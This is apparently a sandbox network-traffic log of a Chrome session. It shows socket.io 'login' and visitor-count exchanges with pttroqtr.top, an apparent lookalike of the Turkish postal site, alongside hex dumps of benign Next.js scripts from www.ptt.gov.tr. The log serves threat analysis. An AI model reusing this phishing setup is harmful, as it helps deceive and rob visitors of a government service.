                                                                                                                                                                                            2024-09-28 03:39:42 UTC394INHTTP/1.1 200 OK
                                                                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                                                                            Keep-Alive: timeout=5
                                                                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                            Last-Modified: Thu, 12 Sep 2024 09:54:45 GMT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            ETag: W/"5c-191e5a81a88"
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:41 GMT
                                                                                                                                                                                            Content-Length: 92
                                                                                                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                                                                                            2024-09-28 03:39:42 UTC92INData Raw: 73 65 6c 66 2e 5f 5f 4d 49 44 44 4c 45 57 41 52 45 5f 4d 41 4e 49 46 45 53 54 3d 5b 5d 3b 73 65 6c 66 2e 5f 5f 4d 49 44 44 4c 45 57 41 52 45 5f 4d 41 4e 49 46 45 53 54 5f 43 42 26 26 73 65 6c 66 2e 5f 5f 4d 49 44 44 4c 45 57 41 52 45 5f 4d 41 4e 49 46 45 53 54 5f 43 42 28 29
                                                                                                                                                                                            Data Ascii: self.__MIDDLEWARE_MANIFEST=[];self.__MIDDLEWARE_MANIFEST_CB&&self.__MIDDLEWARE_MANIFEST_CB()


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            136192.168.2.5498638.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:42 UTC579OUTGET /socket.io/?EIO=4&transport=polling&t=P8sjdin&sid=ZtwaiGyEO0D_jrEhAEf6 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:43 UTC215INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:43 GMT
                                                                                                                                                                                            Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                            Content-Length: 58
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            cache-control: no-store
                                                                                                                                                                                            2024-09-28 03:39:43 UTC58INData Raw: 34 32 5b 22 6f 6e 6c 69 6e 65 2d 63 6f 75 6e 74 2d 75 73 65 72 22 2c 31 2c 22 75 73 65 72 2d 53 63 31 67 78 75 6a 34 54 4f 58 2d 78 6f 4e 32 41 45 66 32 22 2c 74 72 75 65 5d
                                                                                                                                                                                            Data Ascii: 42["online-count-user",1,"user-Sc1gxuj4TOX-xoN2AEf2",true]


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            137192.168.2.5498648.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:42 UTC670OUTPOST /socket.io/?EIO=4&transport=polling&t=P8sjdiu&sid=ZtwaiGyEO0D_jrEhAEf6 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            Content-Length: 49
                                                                                                                                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Content-type: text/plain;charset=UTF-8
                                                                                                                                                                                            sec-ch-ua-mobile: ?0
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            sec-ch-ua-platform: "Windows"
                                                                                                                                                                                            Origin: https://pttroqtr.top
                                                                                                                                                                                            Sec-Fetch-Site: same-origin
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Referer: https://pttroqtr.top/help/
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:42 UTC49OUTData Raw: 34 32 34 5b 22 6c 6f 67 69 6e 22 2c 22 75 73 65 72 2d 53 63 31 67 78 75 6a 34 54 4f 58 2d 78 6f 4e 32 41 45 66 32 22 2c 5b 22 75 73 65 72 22 5d 5d
                                                                                                                                                                                            Data Ascii: 424["login","user-Sc1gxuj4TOX-xoN2AEf2",["user"]]
                                                                                                                                                                                            2024-09-28 03:39:43 UTC198INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:43 GMT
                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                            Content-Length: 2
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            cache-control: no-store
                                                                                                                                                                                            2024-09-28 03:39:43 UTC2INData Raw: 6f 6b
                                                                                                                                                                                            Data Ascii: ok


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            138192.168.2.5498678.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:42 UTC405OUTGET /socket.io/?EIO=4&transport=polling&t=P8sjdTi&sid=ZtwaiGyEO0D_jrEhAEf6 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:43 UTC215INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:43 GMT
                                                                                                                                                                                            Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                            Content-Length: 98
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            cache-control: no-store
                                                                                                                                                                                            2024-09-28 03:39:43 UTC98INData Raw: 34 33 34 5b 7b 22 63 6f 64 65 22 3a 30 2c 22 6d 73 67 22 3a 22 6f 6b 22 2c 22 74 69 6d 65 22 3a 22 53 61 74 20 53 65 70 20 32 38 20 32 30 32 34 20 30 33 3a 33 39 3a 34 32 20 47 4d 54 2b 30 30 30 30 20 28 43 6f 6f 72 64 69 6e 61 74 65 64 20 55 6e 69 76 65 72 73 61 6c 20 54 69 6d 65 29 22 7d 5d
                                                                                                                                                                                            Data Ascii: 434[{"code":0,"msg":"ok","time":"Sat Sep 28 2024 03:39:42 GMT+0000 (Coordinated Universal Time)"}]


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            139192.168.2.5498688.211.203.1654432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:42 UTC405OUTGET /socket.io/?EIO=4&transport=polling&t=P8sjdTo&sid=ZtwaiGyEO0D_jrEhAEf6 HTTP/1.1
                                                                                                                                                                                            Host: pttroqtr.top
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:44 UTC214INHTTP/1.1 200 OK
                                                                                                                                                                                            Server: nginx/1.24.0
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:44 GMT
                                                                                                                                                                                            Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                            Content-Length: 1
                                                                                                                                                                                            Connection: close
                                                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                                                            cache-control: no-store
                                                                                                                                                                                            2024-09-28 03:39:44 UTC1INData Raw: 31
                                                                                                                                                                                            Data Ascii: 1


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            140192.168.2.549866185.220.152.264432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:43 UTC382OUTGET /_next/static/chunks/main-8430b752c8e66574.js HTTP/1.1
                                                                                                                                                                                            Host: www.ptt.gov.tr
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:43 UTC401INHTTP/1.1 200 OK
                                                                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                                                                            Keep-Alive: timeout=5
                                                                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                            Last-Modified: Thu, 12 Sep 2024 09:54:30 GMT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            ETag: W/"1a4f9-191e5a7dff0"
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:43 GMT
                                                                                                                                                                                            Content-Length: 107769
                                                                                                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
                                                                                                                                                                                            2024-09-28 03:39:43 UTC6870INData Raw: 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 31 37 39 5d 2c 7b 33 37 33 35 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 22 74 72 69 6d 53 74 61 72 74 22 69 6e 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 28 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 74 72 69 6d 53 74 61 72 74 3d 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 74 72 69 6d 4c 65 66 74 29 2c 22 74 72 69 6d 45 6e 64 22 69 6e 20 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 28 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 74 72 69 6d 45 6e 64 3d 53 74 72 69 6e 67 2e 70 72 6f 74 6f 74 79 70 65 2e 74 72 69 6d 52 69 67 68 74 29 2c 22 64 65 73 63
                                                                                                                                                                                            Data Ascii: (self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[179],{3735:function(){"trimStart"in String.prototype||(String.prototype.trimStart=String.prototype.trimLeft),"trimEnd"in String.prototype||(String.prototype.trimEnd=String.prototype.trimRight),"desc
                                                                                                                                                                                            2024-09-28 03:39:43 UTC7271INData Raw: 63 6f 6d 70 6c 65 74 69 6f 6e 3b 69 66 28 22 74 68 72 6f 77 22 3d 3d 3d 6e 2e 74 79 70 65 29 7b 76 61 72 20 6f 3d 6e 2e 61 72 67 3b 45 28 72 29 7d 72 65 74 75 72 6e 20 6f 7d 7d 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 69 6c 6c 65 67 61 6c 20 63 61 74 63 68 20 61 74 74 65 6d 70 74 22 29 7d 2c 64 65 6c 65 67 61 74 65 59 69 65 6c 64 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 64 65 6c 65 67 61 74 65 3d 7b 69 74 65 72 61 74 6f 72 3a 52 28 65 29 2c 72 65 73 75 6c 74 4e 61 6d 65 3a 72 2c 6e 65 78 74 4c 6f 63 3a 6e 7d 2c 22 6e 65 78 74 22 3d 3d 3d 74 68 69 73 2e 6d 65 74 68 6f 64 26 26 28 74 68 69 73 2e 61 72 67 3d 74 29 2c 68 7d 7d 2c 65 7d 28 65 2e 65 78 70 6f 72 74 73 29 3b 74 72 79 7b 72 65 67 65 6e 65 72
                                                                                                                                                                                            Data Ascii: completion;if("throw"===n.type){var o=n.arg;E(r)}return o}}throw new Error("illegal catch attempt")},delegateYield:function(e,r,n){return this.delegate={iterator:R(e),resultName:r,nextLoc:n},"next"===this.method&&(this.arg=t),h}},e}(e.exports);try{regener
                                                                                                                                                                                            2024-09-28 03:39:43 UTC7271INData Raw: 65 2c 48 54 4d 4c 45 6c 65 6d 65 6e 74 29 26 26 72 28 74 2c 48 54 4d 4c 45 6c 65 6d 65 6e 74 29 29 7b 76 61 72 20 6e 3d 74 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 6f 6e 63 65 22 29 3b 69 66 28 6e 26 26 21 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 6f 6e 63 65 22 29 29 7b 76 61 72 20 6f 3d 74 2e 63 6c 6f 6e 65 4e 6f 64 65 28 21 30 29 3b 72 65 74 75 72 6e 20 6f 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 6f 6e 63 65 22 2c 22 22 29 2c 6f 2e 6e 6f 6e 63 65 3d 6e 2c 6e 3d 3d 3d 65 2e 6e 6f 6e 63 65 26 26 65 2e 69 73 45 71 75 61 6c 4e 6f 64 65 28 6f 29 7d 7d 72 65 74 75 72 6e 20 65 2e 69 73 45 71 75 61 6c 4e 6f 64 65 28 74 29 7d 74 2e 44 4f 4d 41 74 74 72 69 62 75 74 65 4e 61 6d 65 73 3d 6e 2c 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79
                                                                                                                                                                                            Data Ascii: e,HTMLElement)&&r(t,HTMLElement)){var n=t.getAttribute("nonce");if(n&&!e.getAttribute("nonce")){var o=t.cloneNode(!0);return o.setAttribute("nonce",""),o.nonce=n,n===e.nonce&&e.isEqualNode(o)}}return e.isEqualNode(t)}t.DOMAttributeNames=n,("function"===ty
                                                                                                                                                                                            2024-09-28 03:39:43 UTC7271INData Raw: 75 6c 6c 3d 3d 61 3f 69 3a 61 2c 6c 61 62 65 6c 3a 22 6d 61 72 6b 22 3d 3d 3d 75 7c 7c 22 6d 65 61 73 75 72 65 22 3d 3d 3d 75 3f 22 63 75 73 74 6f 6d 22 3a 22 77 65 62 2d 76 69 74 61 6c 22 7d 3b 6e 75 6c 6c 3d 3d 3d 63 7c 7c 76 6f 69 64 20 30 3d 3d 3d 63 7c 7c 63 28 66 29 2c 41 2e 74 72 61 63 6b 57 65 62 56 69 74 61 6c 4d 65 74 72 69 63 28 66 29 7d 2c 65 2e 6e 65 78 74 3d 31 35 3b 62 72 65 61 6b 3b 63 61 73 65 20 31 35 3a 72 65 74 75 72 6e 20 65 2e 6e 65 78 74 3d 31 37 2c 57 2e 72 6f 75 74 65 4c 6f 61 64 65 72 2e 77 68 65 6e 45 6e 74 72 79 70 6f 69 6e 74 28 71 2e 70 61 67 65 29 3b 63 61 73 65 20 31 37 3a 65 2e 74 30 3d 65 2e 73 65 6e 74 3b 63 61 73 65 20 31 38 3a 69 66 28 21 28 22 65 72 72 6f 72 22 69 6e 28 6c 3d 65 2e 74 30 29 29 29 7b 65 2e 6e 65 78 74
                                                                                                                                                                                            Data Ascii: ull==a?i:a,label:"mark"===u||"measure"===u?"custom":"web-vital"};null===c||void 0===c||c(f),A.trackWebVitalMetric(f)},e.next=15;break;case 15:return e.next=17,W.routeLoader.whenEntrypoint(q.page);case 17:e.t0=e.sent;case 18:if(!("error"in(l=e.t0))){e.next
                                                                                                                                                                                            2024-09-28 03:39:43 UTC7271INData Raw: 3d 74 2e 64 65 66 61 75 6c 74 29 26 26 28 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 74 2e 64 65 66 61 75 6c 74 2c 74 29 2c 65 2e 65 78 70 6f 72 74 73 3d 74 2e 64 65 66 61 75 6c 74 29 7d 2c 32 35 36 34 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 66 75 6e 63 74 69 6f 6e 20 72 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 65 6e 64 73 57 69 74 68 28 22 2f 22 29 26 26 22 2f 22 21 3d 3d 65 3f 65 2e 73 6c 69 63 65 28 30 2c 2d 31 29 3a 65 7d 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 72 65 6d 6f 76 65 50 61 74 68 54 72 61 69 6c 69 6e 67 53 6c 61 73 68 3d 72 2c 74 2e 6e 6f 72 6d 61 6c 69 7a 65 50 61 74 68 54 72 61 69 6c 69
                                                                                                                                                                                            Data Ascii: =t.default)&&(Object.assign(t.default,t),e.exports=t.default)},2564:function(e,t){"use strict";function r(e){return e.endsWith("/")&&"/"!==e?e.slice(0,-1):e}Object.defineProperty(t,"__esModule",{value:!0}),t.removePathTrailingSlash=r,t.normalizePathTraili
                                                                                                                                                                                            2024-09-28 03:39:43 UTC7271INData Raw: 79 28 74 2c 22 5f 5f 65 73 4d 6f 64 75 6c 65 22 2c 7b 76 61 6c 75 65 3a 21 30 7d 29 2c 74 2e 6d 61 72 6b 41 73 73 65 74 45 72 72 6f 72 3d 6c 2c 74 2e 69 73 41 73 73 65 74 45 72 72 6f 72 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 63 20 69 6e 20 65 7d 2c 74 2e 67 65 74 43 6c 69 65 6e 74 42 75 69 6c 64 4d 61 6e 69 66 65 73 74 3d 66 2c 74 2e 67 65 74 4d 69 64 64 6c 65 77 61 72 65 4d 61 6e 69 66 65 73 74 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 73 65 6c 66 2e 5f 5f 4d 49 44 44 4c 45 57 41 52 45 5f 4d 41 4e 49 46 45 53 54 29 72 65 74 75 72 6e 20 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 73 65 6c 66 2e 5f 5f 4d 49 44 44 4c 45 57 41 52 45 5f 4d 41 4e 49 46 45 53 54 29 3b 72 65 74 75 72 6e 20 73 28 6e 65 77 20 50 72 6f 6d 69 73
                                                                                                                                                                                            Data Ascii: y(t,"__esModule",{value:!0}),t.markAssetError=l,t.isAssetError=function(e){return e&&c in e},t.getClientBuildManifest=f,t.getMiddlewareManifest=function(){if(self.__MIDDLEWARE_MANIFEST)return Promise.resolve(self.__MIDDLEWARE_MANIFEST);return s(new Promis
                                                                                                                                                                                            2024-09-28 03:39:43 UTC7271INData Raw: 75 72 6e 20 6c 2e 64 65 66 61 75 6c 74 2e 65 76 65 6e 74 73 7d 7d 29 2c 79 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 68 2c 65 2c 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 76 28 29 5b 65 5d 7d 7d 29 7d 29 29 2c 6d 2e 66 6f 72 45 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 68 5b 65 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 74 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2c 72 3d 6e 65 77 20 41 72 72 61 79 28 74 29 2c 6e 3d 30 3b 6e 3c 74 3b 6e 2b 2b 29 72 5b 6e 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 6e 5d 3b 76 61 72 20 6f 2c 61 3d 76 28 29 3b 72 65 74 75 72 6e 28 6f 3d 61 29 5b 65 5d 2e 61 70 70 6c 79 28 6f 2c
                                                                                                                                                                                            Data Ascii: urn l.default.events}}),y.forEach((function(e){Object.defineProperty(h,e,{get:function(){return v()[e]}})})),m.forEach((function(e){h[e]=function(){for(var t=arguments.length,r=new Array(t),n=0;n<t;n++)r[n]=arguments[n];var o,a=v();return(o=a)[e].apply(o,
                                                                                                                                                                                            2024-09-28 03:39:44 UTC7271INData Raw: 3d 65 2e 67 65 74 49 6e 69 74 69 61 6c 50 72 6f 70 73 2c 74 2e 6f 72 69 67 47 65 74 49 6e 69 74 69 61 6c 50 72 6f 70 73 3d 65 2e 6f 72 69 67 47 65 74 49 6e 69 74 69 61 6c 50 72 6f 70 73 2c 21 31 3b 72 65 74 75 72 6e 20 74 7d 3b 76 61 72 20 6e 2c 6f 3d 28 6e 3d 72 28 32 34 36 36 29 29 26 26 6e 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 6e 3a 7b 64 65 66 61 75 6c 74 3a 6e 7d 2c 61 3d 72 28 35 36 37 30 29 3b 28 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 74 2e 64 65 66 61 75 6c 74 7c 7c 22 6f 62 6a 65 63 74 22 3d 3d 3d 74 79 70 65 6f 66 20 74 2e 64 65 66 61 75 6c 74 26 26 6e 75 6c 6c 21 3d 3d 74 2e 64 65 66 61 75 6c 74 29 26 26 28 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 74 2e 64 65 66 61 75 6c 74 2c 74 29 2c 65 2e 65 78 70 6f 72 74 73 3d 74 2e 64
                                                                                                                                                                                            Data Ascii: =e.getInitialProps,t.origGetInitialProps=e.origGetInitialProps,!1;return t};var n,o=(n=r(2466))&&n.__esModule?n:{default:n},a=r(5670);("function"===typeof t.default||"object"===typeof t.default&&null!==t.default)&&(Object.assign(t.default,t),e.exports=t.d
                                                                                                                                                                                            2024-09-28 03:39:44 UTC7271INData Raw: 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 22 2c 22 68 74 74 70 73 3a 2f 2f 75 73 65 2e 74 79 70 65 6b 69 74 2e 6e 65 74 2f 22 5d 2e 73 6f 6d 65 28 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 72 65 74 75 72 6e 20 65 2e 70 72 6f 70 73 2e 68 72 65 66 2e 73 74 61 72 74 73 57 69 74 68 28 74 29 7d 29 29 29 7b 76 61 72 20 69 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 3d 31 3b 74 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 74 2b 2b 29 7b 76 61 72 20 72 3d 6e 75 6c 6c 21 3d 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 74 5d 3a 7b 7d 2c 6f 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 72 29 3b 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 67 65 74
                                                                                                                                                                                            Data Ascii: ://fonts.googleapis.com/css","https://use.typekit.net/"].some((function(t){return e.props.href.startsWith(t)}))){var i=function(e){for(var t=1;t<arguments.length;t++){var r=null!=arguments[t]?arguments[t]:{},o=Object.keys(r);"function"===typeof Object.get
                                                                                                                                                                                            2024-09-28 03:39:44 UTC7271INData Raw: 72 29 3a 7b 7d 3b 6e 2e 67 65 74 7c 7c 6e 2e 73 65 74 3f 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 28 74 2c 72 2c 6e 29 3a 74 5b 72 5d 3d 65 5b 72 5d 7d 72 65 74 75 72 6e 20 74 2e 64 65 66 61 75 6c 74 3d 65 2c 74 7d 28 72 28 32 31 31 32 29 29 2c 76 3d 72 28 35 39 38 37 29 2c 67 3d 72 28 36 30 39 39 29 2c 62 3d 6b 28 72 28 38 31 31 31 29 29 2c 77 3d 72 28 35 35 36 39 29 2c 5f 3d 72 28 33 39 29 2c 50 3d 72 28 36 31 30 36 29 2c 53 3d 72 28 35 30 39 39 29 2c 78 3d 6b 28 72 28 32 34 33 31 29 29 2c 4f 3d 72 28 39 32 36 36 29 2c 45 3d 72 28 38 36 31 35 29 2c 6a 3d 72 28 37 31 31 36 29 2c 52 3d 72 28 32 34 34 36 29 3b 66 75 6e 63 74 69 6f 6e 20 6b 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 65 2e 5f 5f 65 73 4d 6f 64 75 6c 65 3f 65 3a 7b 64 65
                                                                                                                                                                                            Data Ascii: r):{};n.get||n.set?Object.defineProperty(t,r,n):t[r]=e[r]}return t.default=e,t}(r(2112)),v=r(5987),g=r(6099),b=k(r(8111)),w=r(5569),_=r(39),P=r(6106),S=r(5099),x=k(r(2431)),O=r(9266),E=r(8615),j=r(7116),R=r(2446);function k(e){return e&&e.__esModule?e:{de


                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                            141192.168.2.549865185.220.152.264432584C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                            2024-09-28 03:39:43 UTC387OUTGET /_next/static/chunks/framework-0438cefc59f69f60.js HTTP/1.1
                                                                                                                                                                                            Host: www.ptt.gov.tr
                                                                                                                                                                                            Connection: keep-alive
                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                            Accept: */*
                                                                                                                                                                                            Sec-Fetch-Site: none
                                                                                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                            2024-09-28 03:39:43 UTC401INHTTP/1.1 200 OK
                                                                                                                                                                                            Cache-Control: public, max-age=31536000, immutable
                                                                                                                                                                                            Keep-Alive: timeout=5
                                                                                                                                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                                                                                                                                            Last-Modified: Thu, 12 Sep 2024 09:54:30 GMT
                                                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                                                            ETag: W/"226bf-191e5a7dff0"
                                                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                                                            Date: Sat, 28 Sep 2024 03:39:43 GMT
                                                                                                                                                                                            Content-Length: 140991
                                                                                                                                                                                            Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
